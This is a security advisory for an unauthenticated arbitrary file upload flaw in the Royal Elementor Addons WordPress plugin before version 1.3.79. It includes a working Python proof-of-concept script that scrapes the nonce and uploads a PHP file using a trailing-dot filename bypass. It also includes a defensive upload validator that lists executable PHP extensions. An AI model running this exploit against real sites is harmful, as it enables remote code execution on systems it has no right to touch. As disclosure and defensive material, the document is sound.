WordPress Plugin Vulnerabilities

Royal Elementor Addons and Templates < 1.3.79 - Unauthenticated Arbitrary File Upload

Description

The plugin does not properly validate uploaded files, which could allow unauthenticated users to upload arbitrary files, such as PHP scripts, and achieve remote code execution (RCE).

Proof of Concept

Make sure you have Elementor installed and a page or post edited with Elementor.

Here's the Python script that runs the proof of concept.

import io
import re
import sys
from urllib import parse

import requests

if len(sys.argv) != 2:
	print('USAGE: python %s <target_elementor_page>' % (sys.argv[0],))
	sys.exit(1)

elementor_url = sys.argv[1].rstrip('/')
parsed_url = parse.urlparse(elementor_url)
root_url = f'{parsed_url.scheme}://{parsed_url.netloc}'

with requests.Session() as s:
	print('# Getting nonce..')
	# The plugin embeds its AJAX nonce in the WprConfig object of any page built with Elementor.
	page = s.get(elementor_url).text
	match = re.search(r'WprConfig = \{.*"nonce":"([a-f0-9]+)"', page)
	if match is None:
		print('Error: Couldn\'t get nonce.')
		sys.exit(1)
	nonce = match.group(1)

	print('# Uploading shell..')
	shell = io.BytesIO(b'<?php phpinfo();')
	data = {
		'wpr_addons_nonce': nonce,
		# Both limits are taken from the client, so the request supplies its own.
		'max_file_size': 100,
		'allowed_file_types': ',',
		'action': 'wpr_addons_upload_file',
		'triggering_event': 'click',
	}
	file = {
		# Trailing dot: passes a naive extension check but is stored and served as .php.
		'uploaded_file': ('phpinfo.php.', shell),
	}
	print(s.post(f'{root_url}/wp-admin/admin-ajax.php', data=data, files=file).text)
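The proof of concept works because the plugin accepted a client-supplied allow-list and a filename with a trailing dot. As an added defensive example (not the plugin's code and not part of the advisory), the following validator shows how an upload handler should decide server-side; the allow-list, deny-list and size limit are assumed values chosen for illustration.

```python
import posixpath
from typing import Tuple

# Server-side allow-list (assumed values). The PoC above succeeded because the
# plugin let the client send allowed_file_types, so the list must live here.
ALLOWED_EXTENSIONS = {"jpg", "jpeg", "png", "gif", "pdf", "txt", "csv"}
# Extensions a web server may hand to the PHP interpreter; reject them in any
# position of the name ("shell.php.jpg" as well as "shell.php").
EXECUTABLE_EXTENSIONS = {"php", "php3", "php4", "php5", "php7", "php8",
                         "phtml", "phar", "phps"}
MAX_FILE_SIZE = 2 * 1024 * 1024  # server-side limit, not the client's max_file_size


def validate_upload(filename: str, size: int) -> Tuple[bool, str]:
    """Return (accepted, stored_name_or_reason). Pure function, easy to unit-test."""
    # Drop any directory components the client sent ("../x.png" -> "x.png").
    name = posixpath.basename(filename.replace("\\", "/"))
    # "phpinfo.php." is the trick used in the PoC: a naive check sees an empty
    # extension, but the filesystem and web server treat the file as .php.
    name = name.rstrip(". ")
    if not name or name.startswith("."):
        return False, "empty or hidden filename"
    parts = name.lower().split(".")
    if len(parts) < 2:
        return False, "missing extension"
    exts = parts[1:]
    if any(e in EXECUTABLE_EXTENSIONS for e in exts):
        return False, f"executable extension in name: {name}"
    if exts[-1] not in ALLOWED_EXTENSIONS:
        return False, f"extension not in allow-list: {exts[-1]}"
    if size > MAX_FILE_SIZE:
        return False, "file too large"
    return True, name


if __name__ == "__main__":
    # Constructed inputs: the PoC filename plus a few common variants.
    for candidate in ("phpinfo.php.", "shell.php.jpg", "shell.PHTML", "../../photo.png"):
        print(candidate, "->", validate_upload(candidate, 16))
```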


Affects Plugins

Fixed in 1.3.79

Miscellaneous

Original Researcher
Fioravante Souza
Submitter
Fioravante Souza
Verified
Yes

Timeline

Publicly Published
2023-10-09
Added
2023-10-09
Last Updated
2023-10-09